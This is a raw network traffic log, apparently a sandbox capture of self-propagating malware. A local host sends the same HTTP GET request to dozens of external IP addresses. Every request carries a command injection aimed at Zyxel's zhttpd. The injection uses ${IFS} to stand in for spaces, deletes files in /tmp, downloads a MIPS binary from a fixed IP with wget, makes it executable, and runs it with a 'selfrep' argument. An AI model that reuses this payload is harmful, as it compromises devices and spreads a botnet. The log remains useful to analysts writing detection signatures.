                                                Jan 12, 2024 18:16:39.839133978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8657192.168.2.2338184145.231.158.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839153051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8658192.168.2.2342470205.23.163.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839205027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8659192.168.2.2354524118.136.110.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839235067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8660192.168.2.2336008177.127.146.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839268923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8661192.168.2.2340248190.84.138.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839303017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8662192.168.2.2342808172.56.72.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839338064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8663192.168.2.2337060182.66.173.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839399099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8664192.168.2.235755278.1.147.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839431047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8665192.168.2.2343340197.253.222.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839466095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8666192.168.2.2347252101.166.70.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839500904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8667192.168.2.2340730213.106.250.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839559078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8668192.168.2.2360882148.80.181.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839587927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8669192.168.2.2352244171.151.8.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839632034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8670192.168.2.2357028120.143.130.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839675903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8671192.168.2.2348022184.175.189.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839718103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8672192.168.2.2350216160.24.169.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839752913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8673192.168.2.2349340147.197.235.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839792013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8674192.168.2.234856612.237.218.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839828014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8675192.168.2.235767663.177.71.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839894056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8676192.168.2.235421678.145.38.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839921951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8677192.168.2.2355780209.31.107.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.839971066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8678192.168.2.2346802220.128.25.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840001106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8679192.168.2.235430099.125.137.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840056896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8680192.168.2.234141493.186.214.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840090990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8681192.168.2.235134613.117.173.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840131044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8682192.168.2.235498079.30.62.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840188980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8683192.168.2.2336162196.209.208.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840241909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8684192.168.2.2352970149.78.204.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840286016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8685192.168.2.2349522196.237.200.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840321064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8686192.168.2.2346950183.34.198.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840370893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8687192.168.2.234948453.5.200.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840415955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8688192.168.2.2333908166.117.60.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840437889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8689192.168.2.2354010192.6.17.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840480089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8690192.168.2.234259473.71.197.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840521097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8691192.168.2.2353294205.111.94.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840554953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8692192.168.2.235196425.120.171.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840606928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8693192.168.2.233928031.33.91.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840666056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8694192.168.2.2359942217.83.168.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840708017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8695192.168.2.2343322167.146.40.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840734959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8696192.168.2.235098687.137.168.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840790033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8697192.168.2.2340222155.139.163.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840821028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8698192.168.2.2354754172.204.166.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840866089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8699192.168.2.233844837.93.81.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840909004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8700192.168.2.2336136162.114.210.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840933084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8701192.168.2.235794093.12.34.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.840985060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8702192.168.2.233688478.14.79.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841018915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8703192.168.2.234167475.152.102.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841051102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8704192.168.2.2339378159.15.49.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841106892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8705192.168.2.235931475.186.90.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841145992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8706192.168.2.234646880.165.128.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841183901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8707192.168.2.235291267.255.101.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841227055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8708192.168.2.2357534137.89.41.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841284037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8709192.168.2.2360614216.17.89.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841308117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8710192.168.2.235706686.241.57.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841365099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8711192.168.2.2356814151.86.73.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841399908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8712192.168.2.2350080155.202.223.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841443062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8713192.168.2.233354289.48.161.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841495037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8714192.168.2.2353572190.152.238.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841521978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8715192.168.2.233741687.151.158.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841562033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8716192.168.2.234287637.6.125.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841613054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8717192.168.2.234404637.36.155.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841645002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8718192.168.2.233501043.135.118.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841674089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8719192.168.2.2351878142.125.5.111443
                                                TimestampBytes transferredDirectionData
